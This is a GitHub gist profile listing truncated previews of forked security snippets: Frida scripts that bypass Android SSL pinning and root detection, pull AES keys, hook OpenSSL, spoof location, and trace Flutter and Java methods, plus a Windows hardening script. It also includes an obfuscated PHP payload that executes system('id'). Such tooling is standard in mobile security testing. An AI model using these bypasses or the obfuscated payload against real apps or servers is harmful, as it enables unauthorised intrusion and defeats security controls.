Skip to content

Instantly share code, notes, and snippets.

View AkshayJainG's full-sized avatar

AkshayJainG

26 followers · 329 following
View GitHub Profile
@AkshayJainG
AkshayJainG / pinning.js
Created May 23, 2019 13:48 — forked from cubehouse/pinning.js
A Frida script to bypass SSL Pinning on Android. https://blog.jamie.holdings/2019/01/19/advanced-certificate-bypassing-in-android-with-frida/
// start with:
// frida -U -l pinning.js -f [APP_ID] --no-pause
Java.perform(function () {
console.log('')
console.log('===')
console.log('* Injecting hooks into common certificate pinning methods *')
console.log('===')
var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager');
@AkshayJainG
AkshayJainG / frida-get-AES-keys
Created August 24, 2019 10:56 — forked from d3vilbug/frida-get-AES-keys
#!/usr/bin/env python3
from __future__ import print_function
import frida
import sys
import json
import time
def on_message(message, payload):
if(message['type'] == 'send'):
@AkshayJainG
AkshayJainG / frida_cheatsheet.js
Created October 28, 2019 17:11 — forked from leveled/frida_cheatsheet.js
Frida Cheatsheet
//Executing Frida and loading script
//frida -U --no-pause -l disableRoot.js -f sg.vantagepoint.uncrackable1
//Overwriting a function and getting a return value
aes_decrypt.a.overload("[B","[B").implementation = function(var_0,var_1) {
send("sg.vantagepoint.a.a.a([B[B)[B doFinal(enc) // AES/ECB/PKCS7Padding");
send("Key : " + var_0);
send("Encrypted : " + var_1);
var ret = this.a.overload("[B","[B").call(this,var_0,var_1);
send("Decrypted : " + ret);
@AkshayJainG
AkshayJainG / root_bypass.js
Created December 15, 2019 07:23 — forked from pich4ya/root_bypass.js
Bypass Android Root Detection / Bypass RootBeer - August 2019
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh):
// - I added extra whitelisted items to deal with the latest versions
// of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (kill itself) if Magisk is installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",
@AkshayJainG
AkshayJainG / openssl-frida.js
Created March 24, 2020 12:00 — forked from FrankSpierings/openssl-frida.js
Some OpenSSL hooks in Frida - Work in progress....
function hooks() {
(function() {
var name = 'RSA_public_decrypt';
console.log('[!] Hooking: ' + name);
Interceptor.attach(Module.findExportByName(null, name), {
onEnter: function(args) {
this.length = args[0];
this.data = args[2];
},
onLeave: function(result) {
@AkshayJainG
AkshayJainG / hook_location_frida.js
Created March 24, 2020 12:03 — forked from Areizen/hook_location_frida.js
const simulated_latitude = 48.8534
const simulated_longitude = 2.3488
Java.perform(function(){
const Location = Java.use('android.location.Location')
var location = Location.$new("gps")
location.setLatitude(simulated_latitude)
location.setLongitude(simulated_longitude)
@AkshayJainG
AkshayJainG / funny.php
Created May 4, 2020 11:59 — forked from terjanq/funny.php
PHPF*ck
/* system(id) */
<?=$Φ=([].Φ)[![]+![]+![]]?><?=$Χ=++$Φ?><?=$Ψ=++$Χ?><?=$Ω=++$Ψ?><?=$Ϊ=++$Ω?><?=$Ϋ=++$Ϊ?><?=$ά=++$Ϋ?><?=$έ=++$ά?><?=$ή=++$έ?><?=$ί=++$ή?><?=$ΰ=++$ί?><?=$α=++$ΰ?><?=$β=++$α?><?=$γ=++$β?><?=$δ=++$γ?><?=$ε=++$δ?><?=$ζ=++$ε?><?=$η=++$ζ?><?=$θ=++$η?><?=$ι=++$θ?><?=$κ=++$ι?><?=$λ=++$κ?><?=$μ=++$λ?><?=$ν=++$μ?><?=$ξ=++$ν?><?=$ο=++$ξ?><?=$ο=([].Φ)[![]+![]+![]]?><?=($η.$ν.$η.$θ.$Ω.$α)($έ.$Ψ)?>
@AkshayJainG
AkshayJainG / windows_hardening.cmd
Created May 11, 2020 14:13 — forked from mackwage/windows_hardening.cmd
Script to perform some hardening of Windows OS
:: Windows 10 Hardening Script
:: This is based mostly on my own personal research and testing. My objective is to secure/harden Windows 10 as much as possible while not impacting usability at all. (Think being able to run on this computer's of family members so secure them but not increase the chances of them having to call you to troubleshoot something related to it later on). References for virtually all settings can be found at the bottom. Just before the references section, you will always find several security settings commented out as they could lead to compatibility issues in common consumer setups but they're worth considering.
:: Obligatory 'views are my own'. :)
:: Thank you @jaredhaight for the Win Firewall config recommendations!
:: Thank you @ricardojba for the DLL Safe Order Search reg key!
:: Thank you @jessicaknotts for the help on testing Exploit Guard configs and checking privacy settings!
:: Best script I've found for Debloating Windows 10: https://github.com/Sycnex/Windows10Debloater
:
@AkshayJainG
AkshayJainG / flutter_ios.js
Created August 29, 2020 08:56 — forked from AICDEV/flutter_ios.js
Frida trace Flutter Functions on iOS
/**
* run the script to a running app: frida -U "appName" -l flutter_ios.js --no-pause
* start app direct with the script: frida -Uf bundleIdentifier -l flutter_ios.js --no-pause
*/
// #############################################
// HELPER SECTION START
var colors = {
"resetColor": "\x1b[0m",
"green": "\x1b[32m",
"yellow": "\x1b[33m",
@AkshayJainG
AkshayJainG / hookalloverloads.js
Created August 29, 2020 08:57 — forked from FrankSpierings/hookalloverloads.js
Hook all overloads - Java/Android - Frida
function getGenericInterceptor(className, func, parameters) {
args = []
for (i = 0; i < parameters.length; i++) {
args.push('arg_' + i)
}
var script = "result = this.__FUNCNAME__(__SEPARATED_ARG_NAMES__);\nlogmessage = '__CLASSNAME__.__FUNCNAME__(' + __SEPARATED_ARG_NAMES__ + ') => ' + result;\nconsole.log(logmessage);\nreturn result;"
script = script.replace(/__FUNCNAME__/g, func);
script = script.replace(/__SEPARATED_ARG_NAMES__/g, args.join(', '));
script = script.replace(/__CLASSNAME__/g, className);